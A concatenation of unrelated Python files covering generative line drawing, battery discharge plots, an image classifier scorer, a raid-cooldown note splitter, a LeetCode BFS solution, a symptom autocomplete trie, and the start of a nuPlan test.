def gen_bezier(self, nodes, bez_eval_start=0, bez_eval_end=1, n_eval_points=1000):
nodes = np.asfortranarray(nodes)
curve = bezier.Curve(nodes, degree=(nodes.shape[1]-1))
eval_points = np.linspace(bez_eval_start, bez_eval_end, n_eval_points)
x, y = curve.evaluate_multi(eval_points)
return np.stack([x, y])
def add_bezier(self, nodes, bez_eval_start=0, bez_eval_end=1, n_eval_points=1000, terminate=True):
line = self.gen_bezier(nodes, bez_eval_start, bez_eval_end, n_eval_points)
self.add_line(line, terminate=terminate)
def flip_alternating_lines(self):
lines = layer_to_lines(self.lines)
new_lines = []
for i, line in enumerate(lines):
if i % 2:
new_lines.append(np.flipud(line))
else:
new_lines.append(line)
self.lines = np.append(linebreak, lines_to_layer(new_lines), axis=1)
def plot_lines(self, ax, lc_kwargs={}):
lc = LineCollection(layer_to_lines(self.lines), **lc_kwargs)
ax.add_collection(lc)
ax.axis('tight')
ax.axis('square')
# Cell
class ChordFactory(LineFactory):
def __init__(self,
center=np.array([0.,0.]),
radius=1,
):
self.center = center.reshape(2,1)
self.radius = radius
self.lines = np.array([[np.nan], [np.nan]])
@property
def center_x(self):
return self.center[0]
@property
def center_y(self):
return self.center[1]
def gen_chord(self, theta0, theta1, radius0=None, radius1=None):
if not radius0:
radius0 = self.radius
if not radius1:
radius1 = self.radius
x0, y0 = radial_to_xy(radius0, theta0)
x1, y1 = radial_to_xy(radius1, theta1)
chord = np.array([[x0, x1, np.nan],
[y0, y1, np.nan],
])
chord += self.center
return chord
def add_chord(self, theta0, theta1, radius0=None, radius1=None):
chord = self.gen_chord(theta0, theta1, radius0, radius1)
self.lines = np.append(self.lines, chord, axis=1)
def gen_diameter(self, theta0, radius=None):
if not radius:
radius = self.radius
theta1 = theta0 + np.pi
return self.gen_chord(theta0=theta0,
theta1=theta1,
radius0=radius,
radius1=radius
)
def add_diameter(self, theta0, radius=None):
diameter = self.gen_diameter(theta0, radius)
self.lines = np.append(self.lines, diameter, axis=0)
def gen_bezier_chord(self,
thetas,
radii,
bez_eval_start=0,
bez_eval_end=1,
n_eval_points=1000
):
n = len(thetas)
xs = np.zeros(n)
ys = np.zeros(n)
for i in range(n):
theta = thetas[i]
radius = radii[i]
x, y = radial_to_xy(radius, theta)
xs[i] = x
ys[i] = y
nodes = np.stack([xs,ys])
line = self.gen_bezier(
nodes,
bez_eval_start=bez_eval_start,
bez_eval_end=bez_eval_end,
n_eval_points=n_eval_points)
line = line + self.center
return line
# Cell
class RandomChordFactory(ChordFactory):
def add_random_diameters(self, n_diameters=10):
for theta in np.random.rand(n_diameters) * np.pi * 2:
self.add_diameter(theta)
def add_random_chords_at_set_d_theta(self, n_chords, d_theta):
for theta0 in np.random.rand(n_chords) * np.pi * 2:
theta1 = theta0 + d_theta
self.add_chord(theta0=theta0, theta1=theta1)
def add_connected_chords_at_set_d_theta(self, n_chords, d_theta):
theta0 = np.random.rand() * np.pi * 2
for i in range(n_chords):
theta1 = theta0 + d_theta
self.add_chord(theta0=theta0, theta1=theta1)
theta0 = theta1
def add_connected_chords_stochastic_d_theta(self,
n_chords,
d_theta_mu=0,
d_theta_std=1,
):
theta0 = np.random.rand() * np.pi * 2
for i in range(n_chords):
theta1 = theta0 + np.random.randn() * d_theta_std + d_theta_mu
self.add_chord(theta0=theta0, theta1=theta1)
theta0 = theta1
def add_nearby_chords_stochastic(self,
n_chords,
theta_mu=0,
theta_std=0,
d_theta_mu=0,
d_theta_std=0,
radius_mu=0,
radius_std=0,
):
theta0 = np.random.rand() * np.pi * 2
radius = self.radius
for i in range(n_chords):
theta1 = theta0 + np.random.randn() * d_theta_std + d_theta_mu
self.add_chord(theta0=theta0, theta1=theta1, radius0=radius, radius1=radius)
radius = radius + np.random.randn() * radius_std + radius_mu
theta0 = theta1 + np.random.randn() * theta_std + theta_mu
# Cell
class RadiusModChordFactory(ChordFactory):
def __init__(self,center=np.array([0.,0.])):
self.center = center.reshape(2,1)
self.lines = np.array([[np.nan], [np.nan]])
self.initialize_params()
def initialize_params(self,
n_chords=500,
d_theta=np.pi*0.6,
start_theta=0,
end_theta=np.pi*2,
overshoot_init=1,
overshoot_step_mu=0.,
overshoot_step_std = 20,
):
self.n_chords = n_chords
self.theta0s = np.linspace(start_theta, end_theta, n_chords)
self.theta1s = self.theta0s + d_theta
self.radius0s = np.ones(n_chords)
self.radius1s = np.ones(n_chords)
self.overshoots = gaussian_random_walk(n_chords,
step_init=overshoot_init,
step_mu=overshoot_step_mu,
step_std=overshoot_step_std,
scale=True)
def plot_params(self):
f,axs = plt.subplots(5, 1, sharex=True, figsize=(12,8))
axs[0].plot(self.theta0s, label='theta0s')
axs[1].plot(self.theta1s, label='theta1s')
axs[2].plot(self.radius0s, label='radius0s')
axs[3].plot(self.radius1s, label='radius1s')
axs[4].plot(self.overshoots, label='overshoots')
for ax in axs:
ax.legend()
def add_single_overshoot_chords(self):
for i in range(self.n_chords):
line = self.gen_chord(theta0=self.theta0s[i],
theta1=self.theta1s[i],
radius0=self.radius0s[i],
radius1=self.radius1s[i])
pointA = line[:,0]
pointB = line[:,1]
new_pointB = get_point_on_line(pointA, pointB, self.overshoots[i])
new_line = self.gen_line(pointA, new_pointB)
self.add_line(new_line)
def add_double_overshoot_chords(self):
for i in range(self.n_chords):
line = self.gen_chord(theta0=self.theta0s[i],
theta1=self.theta1s,
radius0=self.radius0s[i],
radius1=self.radius1s[i])
pointA = line[:,0]
pointB = line[:,1]
new_pointB = get_point_on_line(pointA, pointB, self.overshoots[i])
new_pointA = get_point_on_line(pointB, pointA, self.overshoots[i])
new_line = self.gen_line(pointA, new_pointB)
self.add_line(line)
# Cell
class RadiusModBezierChordFactory(ChordFactory):
def __init__(self,center=np.array([0.,0.])):
self.center = center.reshape(2,1)
self.lines = np.array([[np.nan], [np.nan]])
self.initialize_params()
def initialize_params(self,
n_chords=500,
d_theta=np.pi*0.6,
start_theta=0,
end_theta=np.pi*2,
middle_node_rel_thetas=[0.5,],
overshoot_init=1,
overshoot_step_mu=0.,
overshoot_step_std = 20,
):
self.n_chords = n_chords
chord_start_thetas = np.linspace(start_theta, end_theta, n_chords)
chord_end_thetas = chord_start_thetas + d_theta
middle_nodes = []
for node_rel_theta in middle_node_rel_thetas:
middle_nodes.append(chord_start_thetas + d_theta * node_rel_theta)
self.thetas = np.stack([chord_start_thetas,] + middle_nodes + [chord_end_thetas,]).T
self.radii = np.ones(self.thetas.shape)
self.overshoots = gaussian_random_walk(n_chords,
step_init=overshoot_init,
step_mu=overshoot_step_mu,
step_std=overshoot_step_std,
scale=True)
def add_single_overshoot_bezier_chords(self):
for i in range(self.n_chords):
_thetas = self.thetas[i, :]
_radii = self.radii[i, :]
overshoot = self.overshoots[i]
line = self.gen_bezier_chord(
_thetas,
_radii,
bez_eval_start=0,
bez_eval_end=overshoot,
n_eval_points=1000
)
self.add_line(line)
def globe_params(self,
n_chords=500,
start_theta=0.,
end_theta=np.pi*2,
middle_node_rel_thetas=[0.5,],
overshoot_init=1,
overshoot_step_mu=0.,
overshoot_step_std = 0,
):
self.n_chords = n_chords
chord_start_thetas = np.linspace(start_theta, end_theta, n_chords)
chord_end_thetas = - chord_start_thetas
middle_nodes = np.stack([chord_start_thetas,chord_end_thetas]).mean(axis=0)
self.thetas = np.stack([chord_start_thetas, middle_nodes, chord_end_thetas,]).T
self.radii = np.ones(self.thetas.shape)
# self.radii[:,1] = np.linspace(1,-1,n_chords)
self.radii[:,1] = -1
self.overshoots = gaussian_random_walk(n_chords,
step_init=overshoot_init,
step_mu=overshoot_step_mu,
step_std=overshoot_step_std,
scale=True)
# Cell
class Turtle(LineFactory):
def __init__(self, x=0, y=0, rad=0, pen='up'):
self.x = x
self.y = y
self.rad = rad
self.pen = pen
super().__init__()
@property
def coord(self):
return np.array([[self.x], [self.y]])
@coord.setter
def coord(self, new_coord):
self.x = new_coord[0]
self.y = new_coord[1]
@property
def degrees(self):
return self.rad / (np.pi * 2) * 360
@degrees.setter
def degrees(self, degrees):
self.rad = degrees / 360 * np.pi * 2
@coord.setter
def coord(self, new_coord):
self.x = new_coord[0]
self.y = new_coord[1]
def add_point(self):
self.lines = np.append(self.lines, self.coord, axis=1)
def pen_down(self):
self.pen = 'down'
self.add_point()
def pen_up(self):
self.pen = 'up'
self.lines = np.append(self.lines, linebreak.copy(), axis=1)
def forward(self, d):
self.x += np.cos(self.rad) * d
self.y += np.sin(self.rad) * d
if self.pen == 'down':
self.add_point()
def turn(self, d_angle, use_degrees=False):
if use_degrees:
new_degrees = self.degrees + d_angle
self.degrees = new_degrees % 360
else:
new_rad = self.rad + d_angle
self.rad = new_rad % (np.pi * 2)
def circle(self, radius, extent=(np.pi*2), n_eval_points=1000, use_degrees=False):
d_angle = extent / n_eval_points
forward_d = 2 * radius / n_eval_points
for n in range(n_eval_points):
self.forward(forward_d)
self.turn(d_angle, use_degrees=use_degrees)
def split(self):
return self.__class__(x=self.x, y=self.y, rad=self.rad, pen=self.pen)
|
import pandas as pd
import matplotlib.pyplot as plt
oneC = pd.read_csv('discharge_pulse_1.0C.csv')
oneC.columns = ['timestamp', 'time', 'tag', 'voltage', 'current', 'capacity', 'temprerature']
oneC = oneC.drop('timestamp', axis=1)
oneCsoc = 1 - oneC.capacity/oneC.capacity.max() #esto hay que corregirlo porque la capacidad maxima no es la capacidad que ocupamos, se tiene que sacar de las pruebas a C/35
oneC = oneC.assign(soc=oneCsoc.values)
oneCreltime = oneC.time/oneC.time.max()
oneC = oneC.assign(reltime=oneCreltime.values)
print(oneC.head())
halfC = pd.read_csv('discharge_pulse_0.5C.csv')
halfC.columns = ['timestamp', 'time', 'tag', 'voltage', 'current', 'capacity', 'temprerature' ]
halfC = halfC.drop('timestamp', axis=1)
halfCsoc = 1 - halfC.capacity/oneC.capacity.max()
halfC = halfC.assign(soc=halfCsoc.values)
halfCreltime = halfC.time/halfC.time.max()
halfC = halfC.assign(reltime=halfCreltime.values)
print(halfC.head())
quarterC = pd.read_csv('discharge_pulse_0.25C.csv')
quarterC.columns = ['timestamp', 'time', 'tag', 'voltage', 'current', 'capacity', 'temprerature' ]
quarterC = quarterC.drop('timestamp', axis=1)
quarterCsoc = 1 - quarterC.capacity/oneC.capacity.max()
quarterC = quarterC.assign(soc=quarterCsoc.values)
quarterCreltime = quarterC.time/quarterC.time.max()
quarterC = quarterC.assign(reltime=quarterCreltime.values)
print(halfC.head())
plt.figure(figsize=[15,5])
plt.plot(oneC.reltime, oneC.voltage, label='1.0C')
#plt.plot(oneC.time, oneC.soc, label='1.0C')
# plt.plot(halfC.reltime, halfC.voltage, label='0.5C')
# plt.plot(quarterC.reltime, quarterC.voltage, label='0.5C')
plt.xlabel('relative time', fontsize=15)
plt.ylabel('voltage(V)', fontsize=15)
plt.legend()
plt.show()
|
from ..remote import RemoteModel
from infoblox_netmri.utils.utils import check_api_availability
class UploadedCertificateGridRemote(RemoteModel):
"""
| ``id:`` none
| ``attribute type:`` string
| ``certificate_id:`` none
| ``attribute type:`` string
| ``name:`` none
| ``attribute type:`` string
| ``issuer:`` none
| ``attribute type:`` string
| ``validFrom:`` none
| ``attribute type:`` string
| ``validUntil:`` none
| ``attribute type:`` string
| ``subject:`` none
| ``attribute type:`` string
"""
properties = ("id",
"certificate_id",
"name",
"issuer",
"validFrom",
"validUntil",
"subject",
)
|
"""
compute the score and categories
"""
import os
import sys
import torch
import torch.nn.functional as F
from PIL import Image
from torchvision.transforms import transforms
sys.path.append('../')
from contrast.models import vgg19
from networks.resnet import resnet18
from utils.util import add_prefix, remove_prefix, write
def load_pretrained_model(pretrained_path, model_type):
checkpoint = torch.load(add_prefix(pretrained_path, 'model_best.pth.tar'))
if model_type == 'vgg':
model = vgg19(pretrained=False, num_classes=2)
print('load vgg successfully.')
elif model_type == 'resnet':
model = resnet18(is_ptrtrained=False)
print('load resnet18 successfully.')
else:
raise ValueError('')
model.load_state_dict(remove_prefix(checkpoint['state_dict']))
return model
def preprocess(path):
"""
images in custom-defiend skin dataset end with suffix .jpg while images in DR ends with suffix .jpeg
:param path:
:return:
"""
if '.jpeg' in path:
mean = [0.651, 0.4391, 0.2991]
std = [0.1046, 0.0846, 0.0611]
elif '.jpg' in path:
mean = [0.7432, 0.661, 0.6283]
std = [0.0344, 0.0364, 0.0413]
else:
raise ValueError('')
normalize = transforms.Normalize(mean, std)
transform = transforms.Compose([
transforms.ToTensor(),
normalize,
])
img_pil = Image.open(path)
return transform(img_pil).unsqueeze(0)
def main(data_dir, pretrained_path, model_type, saved_path, suffix):
model = load_pretrained_model(pretrained_path, model_type)
model.eval()
results = classifiy(data_dir, model, suffix)
print(str(results))
save_results(results, os.path.join(saved_path, suffix))
def save_results(results, saved_path):
if not os.path.exists(saved_path):
os.makedirs(saved_path)
write(results, '%s/results.txt' % (saved_path))
def classifiy(data_dir, model, suffix):
results = dict()
for phase in ['lesion', 'normal']:
path = '%s/%s_data_%s' % (data_dir, phase, suffix)
total_nums = len(os.listdir(path))
for image_idx, name in enumerate(os.listdir(path), 1):
abs_path = os.path.join(path, name)
img_tensor = preprocess(abs_path)
classes = {'lesion': 0,
'normal': 1}
logit = model(img_tensor)
h_x = F.softmax(logit, dim=1).data.squeeze()
probs, idx = h_x.sort(0, True)
label = 0 if 'lesion' in name else 1
results[name] = dict(label=label, pred=idx[0].item(), prob=probs[0].item())
if image_idx % 50 == 0:
print('%s:[%d/%d]' % (phase, image_idx, total_nums))
return results
if __name__ == '__main__':
# classify dataset
main(data_dir='../gan174/all_results_499/', pretrained_path='../classifier06',
saved_path='../gan174/all_results_499/after_training',
model_type='resnet', suffix='single')
# note parameter should be in ['original', 'single']
main(data_dir='../gan174/all_results_499/', pretrained_path='../classifier06',
saved_path='../gan174/all_results_499/after_training',
model_type='resnet', suffix='original')
|
from enum import Enum
from typing import Match, List, TextIO, Final
from pathlib import Path
import logging
import os
import re
import sys
HEALER_ROSTER = ["Hôsteric", "Delvur", "Yashar", "Pv", "Runnz",
"Lífeforce", "Seiton"]
RAID_LEAD = "Slickduck"
class RaidLeadVisibility(Enum):
ALL = 1
HEALER_CDS = 2
NON_HEALER_CDS = 3
PATH = os.path.join(os.path.dirname(os.path.abspath(__file__)))
SOURCE = os.path.join(PATH, 'soulrender-cds.txt')
NON_HEALER_DEST = os.path.join(PATH, 'non-healer-cds.txt')
ENCAPSULATED_CD_DEST = os.path.join(PATH, 'encapsulapted-cds.txt')
HEADER_REGEX: Final = re.compile(r".*-.*?-\s")
NAME_GROUP_REGEX: Final = "([\s\w]*)"
SPELL_GROUP_REGEX: Final = "(\s*{spell:[0-9]*}\s\s)"
RAID_CD_REGEX: Final = re.compile(
rf"\|c[0-9abcdefABCDEF]{{6,8}}{NAME_GROUP_REGEX}\|r{SPELL_GROUP_REGEX}")
def handle_data_format_bug_1(event_list) -> List[str]:
"""Fix for a known formatting bug.
Spreadsheet can sometimes export cds where there is no space between
name and spell id. This function adds that space.
https://discord.com/channels/756215582021517473/804095740207956009/873297331175432212
Args:
event_list(List[str]): source list of events to be fixed.
Returns:
List of correctly formatted cds.
"""
fixed_event_list = []
for event in event_list:
event = re.sub('[|]r{', '|r {', event)
fixed_event_list.append(event)
return fixed_event_list
def append_event_to_file(event, dest_file):
"""Copies an event to a specified file.
Args:
event(str): The entire event to be copied to the specified file.
An event consists of an event header and list of healer cooldowns.
dest_file(TextIO): The file that will be written to.
"""
dest_file.write(event + '\n')
def clear_file(file_name):
"""Clear the contents of file at the specified path
Args:
file_name(str): The path of the file to clear.
"""
if os.path.isfile(file_name):
file = open(file_name, 'w')
file.close()
def find_header(event) -> str:
"""Returns the header portion of an event.
A header is everything behind the second - including the space after.
Usually one of the following formats:
Dynamic Timers: {time:00:00} |c00000000Name|r - 00:00 -
Static Timers: |c00000000Name|r - 00:00 -
Args:
event(str): The full event string.
"""
match = HEADER_REGEX.match(event)
if match is None:
logging.error("Error parsing header for event event=" + event)
return " "
return match.group()
def find_cds_for_healer(event, healer) -> List[Match]:
"""Returns a list of match objects for a given healer
A cd consists of a name and a spell, in the following format:
color name spell-icon
|cfff38bb9Runnz|r {spell:31821}
Given an event, we run use a regex search to find all of cds the
given healer has this event, and package them into a list of Match
Objects.
Match Object:
Group 1) Name
Group 2) Spell
Args:
event(str): The full event string.
healer(str): The healer whose cds we're looking for.
"""
healer_matches = []
matches = RAID_CD_REGEX.finditer(event)
for match in matches:
if match.groups()[0] == healer:
healer_matches.append(match)
return healer_matches
def get_healer_cd_text_from_matches(healer_cd_matches) -> str:
"""Returns a concatenated string of all cds give the list of matches
Args:
healer_cd_matches(List[Match]): The list of match objects we can use
to get the cd string from.
"""
cd_text = ""
for match in healer_cd_matches:
cd_text += match[0]
return cd_text
def do_split_healer_events(event_list, dest_file, healer):
"""Splits healer cds into files according to healer
Args:
event_list(List[str]): The full list of damage events.
dest_file(TextIO): The file we'll be copying events to.
healer: The current healer that we're copying cds for.
"""
event_list = handle_data_format_bug_1(event_list)
for event in event_list:
# This is the list of cds the current healer has on this boss ability
healer_cd_matches = find_cds_for_healer(event, healer)
# This is the concatenated string of cds for this event and healer.
healer_cd_text = get_healer_cd_text_from_matches(healer_cd_matches)
if healer_cd_text:
# This is the boss ability name and timestamp.
header = find_header(event)
event_text = header + healer_cd_text
append_event_to_file(event_text, dest_file)
def split_healer_events(cd_source):
"""Splits healer events into their respective files. """
for healer in HEALER_ROSTER:
with open(os.path.join(PATH, healer + '-cds.txt'),
'a+', encoding='utf-8') as cd_dest:
do_split_healer_events(cd_source, cd_dest, healer)
def remove_cds_from_event(event, healer) -> str:
"""Returns an event line that has been stripped of healer cds
Args:
event(str): The event we're processing
healer(str): The healer whose cds are being stripped from the event.
"""
matches = find_cds_for_healer(event, healer)
processed_event = event
for matchNum, match in enumerate(matches, start=1):
groups = match.groups()
if groups[0] == healer:
processed_event = processed_event.replace(match[0], "")
return processed_event
def do_strip_healer_cds(event_list, dest_file):
"""Strips healer cds from every event
Non-healer cds all go in the same file. This function will take
every event and remove all of the healer cds such that all that remains
is the non-healer cds.
Args:
event_list(List[str]): The list of events to process
dest_file(TextIO): The destination file to copy non-healer cds.
"""
event_list = handle_data_format_bug_1(event_list)
for event in event_list:
header = find_header(event)
processed_event = event
processed_event = processed_event.replace(header, "")
processed_event = processed_event.replace("\n", "")
for current_healer in HEALER_ROSTER:
processed_event = remove_cds_from_event(processed_event,
current_healer)
if processed_event:
processed_event = header + processed_event
append_event_to_file(processed_event, dest_file)
def strip_healer_cds(event_list):
"""Strips healer cds from the event list"""
with open(NON_HEALER_DEST, 'a+', encoding='utf-8') as dest_file:
do_strip_healer_cds(event_list, dest_file)
def should_be_visible_to_raid_leader(raider, raid_lead_visibility) -> bool:
"""Returns whether the raid leader should included in visibility
i.e, your raid leader may still want to call for non-healer cds or even
healer cds. This function returns true if the raider's status matches
the value of raid_lead_visibility.
Args:
raider: The name of the current raider. Used to look up whether healer
or not.
raid_lead_visibility(RaidLeadVisibility): flag that determines
whether the raid leader should be concerned about the raider's cds.
ALL - your raid leader will be able to see all raid cds
HEALER_CDS - your raid leader will be able to see all healer cds
NON_HEALER_CDS - your raid leader will be able to see cds only from
non healers like DH, DK, Warrior, etc.
"""
return (raid_lead_visibility == RaidLeadVisibility.ALL
or (raid_lead_visibility == RaidLeadVisibility.HEALER_CDS and
raider in HEALER_ROSTER)
or (raid_lead_visibility == RaidLeadVisibility.NON_HEALER_CDS and
raider not in HEALER_ROSTER))
def get_encapsulated_cd_from_match(cd_match, raid_lead_visibility) -> str:
"""Returns the healing cd wrapped in ERT visibility tags
Positive visibility tags have the following syntax:
opening tag text closing tag
{p: List[names]} ....... {/p}}
Any text between the opening and closing tag will only be visible
to raiders whose names are in the list of names.
Args:
cd_match(Match Object): The entire match object for a healing cd.
raid_lead_visibility(bool): flag that determines whether a the raid
leader should also be able to see this cd.
"""
visibility_list = []
groups = cd_match.groups()
raider_name = groups[0]
if should_be_visible_to_raid_leader(raider_name, raid_lead_visibility):
visibility_list.append(RAID_LEAD)
visibility_list.append(raider_name)
visibility_str = ','.join(visibility_list)
cd = cd_match[0]
encapsulated_cd = f"{{p:{visibility_str}}}{cd}{{/p}}"
return encapsulated_cd
def encapsulate_cds(event_list, raid_lead_visibility):
"""Wraps cds in the event list with encapsulators that will cause
ERT to only render cds to their cooresponding owners. The logic for
visibility is as follows:
If noone has cds for an event, the event is not added to the ERT note.
If a raider has a cd for an event, that event header and cd is visible
only to that raider
If the raid leader should also see the raider's cd according to the
raid_lead_visibility flag, then the event and specific raider cd
will also be visible to the raid lead.
ARGS:
event_list(List(str)): List of events containing raid cds.
raid_lead_visibility(boolean): indicates whether the raid leader should
be included in the encapsulation.
"""
encapsulated_event_text = ""
for event in event_list:
header = find_header(event)
cds = ""
matches = RAID_CD_REGEX.finditer(event)
# If a healer has no cds for this event, they should also not see a
# header.
header_visibility_list = []
is_header_visible_to_rl = False
for match in matches:
groups = match.groups()
raider_name = groups[0]
# If we matched a healer for this event, the header should be
# visible to them.
header_visibility_list.append(raider_name)
is_raider_visible_to_rl = should_be_visible_to_raid_leader(
raider_name, raid_lead_visibility)
# If any raider cd in this event is visible to the raid leader,
# then the raidleader should also see the header.
is_header_visible_to_rl |= is_raider_visible_to_rl
cds += get_encapsulated_cd_from_match(match,
raid_lead_visibility)
if is_header_visible_to_rl:
header_visibility_list.append(RAID_LEAD)
# Only add unique values to the visibility list.
header_visibility_set = list(set(header_visibility_list))
visibility_str = ','.join(header_visibility_set)
# Don't add event if noone has cds on it.
if cds:
# Don't show a header to people who don't have cds for this event.
encapsulated_header = f"{{p:{visibility_str}}}{header}{{/p}}"
encapsulated_event_text += f"{encapsulated_header}{cds}\n"
with open(ENCAPSULATED_CD_DEST, 'a+', encoding='utf8') as dest_file:
append_event_to_file(encapsulated_event_text, dest_file)
def main():
for healer in HEALER_ROSTER:
file_name = healer + '-cds.txt'
clear_file(file_name)
clear_file(NON_HEALER_DEST)
with open(SOURCE, 'r', encoding='utf-8') as test_file:
event_list = test_file.readlines()
split_healer_events(event_list)
strip_healer_cds(event_list)
raid_lead_visibility = RaidLeadVisibility.NON_HEALER_CDS
clear_file(ENCAPSULATED_CD_DEST)
with open(SOURCE, 'r', encoding='utf-8') as source_file:
event_list = source_file.readlines()
encapsulate_cds(event_list, raid_lead_visibility)
if __name__ == "__main__":
main()
|
# @lc app=leetcode id=433 lang=python3
#
# [433] Minimum Genetic Mutation
#
# https://leetcode.com/problems/minimum-genetic-mutation/description/
#
# algorithms
# Medium (44.32%)
# Likes: 638
# Dislikes: 79
# Total Accepted: 42.8K
# Total Submissions: 96.4K
# Testcase Example: '"AACCGGTT"\n"AACCGGTA"\n["AACCGGTA"]'
#
# A gene string can be represented by an 8-character long string, with choices
# from 'A', 'C', 'G', and 'T'.
#
# Suppose we need to investigate a mutation from a gene string start to a gene
# string end where one mutation is defined as one single character changed in
# the gene string.
#
#
# For example, "AACCGGTT" --> "AACCGGTA" is one mutation.
#
#
# There is also a gene bank bank that records all the valid gene mutations. A
# gene must be in bank to make it a valid gene string.
#
# Given the two gene strings start and end and the gene bank bank, return the
# minimum number of mutations needed to mutate from start to end. If there is
# no such a mutation, return -1.
#
# Note that the starting point is assumed to be valid, so it might not be
# included in the bank.
#
#
# Example 1:
#
#
# Input: start = "AACCGGTT", end = "AACCGGTA", bank = ["AACCGGTA"]
# Output: 1
#
#
# Example 2:
#
#
# Input: start = "AACCGGTT", end = "AAACGGTA", bank =
# ["AACCGGTA","AACCGCTA","AAACGGTA"]
# Output: 2
#
#
# Example 3:
#
#
# Input: start = "AAAAACCC", end = "AACCCCCC", bank =
# ["AAAACCCC","AAACCCCC","AACCCCCC"]
# Output: 3
#
#
#
# Constraints:
#
#
# start.length == 8
# end.length == 8
# 0 <= bank.length <= 10
# bank[i].length == 8
# start, end, and bank[i] consist of only the characters ['A', 'C', 'G', 'T'].
#
#
#
# @lc tags=Unknown
# @lc imports=start
from imports import *
# @lc imports=end
# @lc idea=start
#
# 给定基因序列,与一个可能的突变集合,每次只能突变一个位置,求从开始到最后的最小突变次数。
# 图,广度优先遍历。
#
# @lc idea=end
# @lc group=
# @lc rank=
# @lc code=start
class Solution:
def minMutation(self, start: str, end: str, bank: List[str]) -> int:
if start == end:
return 0
if end not in bank:
return -1
if start not in bank:
bank.append(start)
adj = defaultdict(list)
l = len(bank)
kr = range(8)
for i in range(l):
si = bank[i]
for j in range(i + 1, l):
sj = bank[j]
if [si[k] == sj[k] for k in kr].count(True) == 7:
adj[si].append(sj)
adj[sj].append(si)
adjs = [start]
n = 0
visited = set(adjs)
while adjs:
adjsn = []
n += 1
for ad in adjs:
for a in adj[ad]:
if a == end:
return n
if a not in visited:
visited.add(a)
adjsn.append(a)
adjs = adjsn
return -1
pass
# @lc code=end
# @lc main=start
if __name__ == '__main__':
print('Example 1:')
print('Input : ')
print('start = "AACCGGTT", end = "AACCGGTA", bank = ["AACCGGTA"]')
print('Exception :')
print('1')
print('Output :')
print(str(Solution().minMutation("AACCGGTT", "AACCGGTA", ["AACCGGTA"])))
print()
print('Example 2:')
print('Input : ')
print(
'start = "AACCGGTT", end = "AAACGGTA", bank =["AACCGGTA","AACCGCTA","AAACGGTA"]'
)
print('Exception :')
print('2')
print('Output :')
print(
str(Solution().minMutation("AACCGGTT", "AAACGGTA",
["AACCGGTA", "AACCGCTA", "AAACGGTA"])))
print()
print('Example 3:')
print('Input : ')
print(
'start = "AAAAACCC", end = "AACCCCCC", bank =["AAAACCCC","AAACCCCC","AACCCCCC"]'
)
print('Exception :')
print('3')
print('Output :')
print(
str(Solution().minMutation("AAAAACCC", "AACCCCCC",
["AAAACCCC", "AAACCCCC", "AACCCCCC"])))
print()
pass
# @lc main=end
|
import pandas as pd
import os
import logging
class TrieNode():
def __init__(self):
self.children = {}
self.rank = 0
self.isEnd = False
self.data = None
class AutocompleteSystem():
def __init__(self):
self.root = TrieNode()
self.searchWord = ''
symps = pd.read_csv('data/symptom_ids.csv')
self.symptoms = []
for i in range(len(symps.columns)):
if i > 0 and i != 170:
key = str(i)
self.symptoms.append(symps[key][0].lower())
self.formTrie(self.symptoms)
def formTrie(self, symptoms):
for symptom in symptoms:
self._addRecord(symptom, 0)
def _addRecord(self, symptom, hotdegree):
node = self.root
for ch in list(symptom):
if not node.children.get(ch):
node.children[ch] = TrieNode()
node = node.children[ch]
node.isEnd = True
node.data = symptom
node.rank -= hotdegree
'''def Search(self, symptom):
node = self.root
found = True
for ch in list(symptom):
if not node.children.get(ch):
found = False
break
node = node.children[ch]
return node and node.isEnd and found'''
def suggestions(self, node, word):
if node.isEnd:
self.word_list.append((node.rank, word))
for ch,n in node.children.items():
self.suggestions(n, word + ch)
def search(self, symptom):
self.word_list = []
node = self.root
nonexsistent = False
search_char = ''
for ch in list(symptom.lower()):
if not node.children.get(ch):
nonexsistent = True
break
search_char += ch
node = node.children[ch]
if nonexsistent:
return []
self.suggestions(node, search_char)
res = [s[1].title() for s in sorted(self.word_list)[:5]]
logging.debug(res)
return res
def get_symptom_id(self, symptom_name):
symptom_name = symptom_name.lower()
if (symptom_name in self.symptoms):
return self.symptoms.index(symptom_name)
else:
return -1
def get_symptom_name(self, symptom_id):
return self.symptoms[int(symptom_id)]
def select(self,symptom_id):
if 0 <= symptom_id < len(self.symptoms):
self._addRecord(self.symptoms[symptom_id], 1)
|
myl1 = [1,2,3,4, 'Hello', 'Python']
myl2 = ['is','awesome']
myl1.extend(myl2) # EX1
print(myl1)# EX2
myl3 = ['Stay', 'Happy','Stay']
myl4 = 'Safe'
myl3.extend(myl4)# EX3
print(myl3)# EX4
myl5 = ['True',10.1]
myset1 = {30,10,20}
myl5.extend(myset1)# EX5
print(myl5)# EX6
|
import json
import os
import tempfile
import unittest
from pathlib import Path
from bokeh.document.document import Document
from bokeh.palettes import Bokeh, Category20, Set3
from nuplan.planning.metrics.metric_engine import MetricsEngine
from nuplan.planning.metrics.metric_file import MetricFile, MetricFileKey
from nuplan.planning.metrics.metric_result import MetricStatistics, MetricStatisticsType, Statistic, TimeSeries
from nuplan.planning.nuboard.base.base_tab import BaseTab
from nuplan.planning.nuboard.base.data_class import NuBoardFile
from nuplan.planning.nuboard.base.experiment_file_data import ExperimentFileData
from nuplan.planning.simulation.main_callback.metric_file_callback import MetricFileCallback
class TestBaseTab(unittest.TestCase):
"""Test base_tab functionality."""
def set_up_dummy_simulation(
self,
simulation_path: Path,
log_name: str,
planner_name: str,
scenario_type: str,
scenario_name: str,
) -> None:
"""
Set up dummy simulation data.
:param simulation_path: Simulation path.
:param log_name: Log name.
:param planner_name: Planner name.
:param scenario_type: Scenario type.
:param scenario_name: Scenario name.
"""
json_file = Path(os.path.dirname(os.path.realpath(__file__))) / "json/test_simulation_tile.json"
with open(json_file, "r") as f:
simulation_data = json.load(f)
# Save to a tmp folder
save_path = simulation_path / planner_name / scenario_type / log_name / scenario_name
save_path.mkdir(parents=True, exist_ok=True)
save_file = save_path / "1.json"
with open(save_file, "w") as f:
json.dump(simulation_data, f)
def set_up_dummy_metric(
self, metric_path: Path, log_name: str, planner_name: str, scenario_type: str, scenario_name: str
) -> None:
"""
Set up dummy metric results.
:param metric_path: Metric path.
:param log_name: Log name.
:param planner_name: Planner name.
:param scenario_type: Scenario type.
:param scenario_name: Scenario name.
"""
# Set up dummy metric statistics
statistics = {
MetricStatisticsType.MAX: Statistic(
name="ego_max_acceleration", unit="meters_per_second_squared", value=2.0
),
MetricStatisticsType.MIN: Statistic(
name="ego_min_acceleration", unit="meters_per_second_squared", value=0.0
),
MetricStatisticsType.P90: Statistic(
name="ego_p90_acceleration", unit="meters_per_second_squared", value=1.0
),
}
time_stamps = [0, 1, 2]
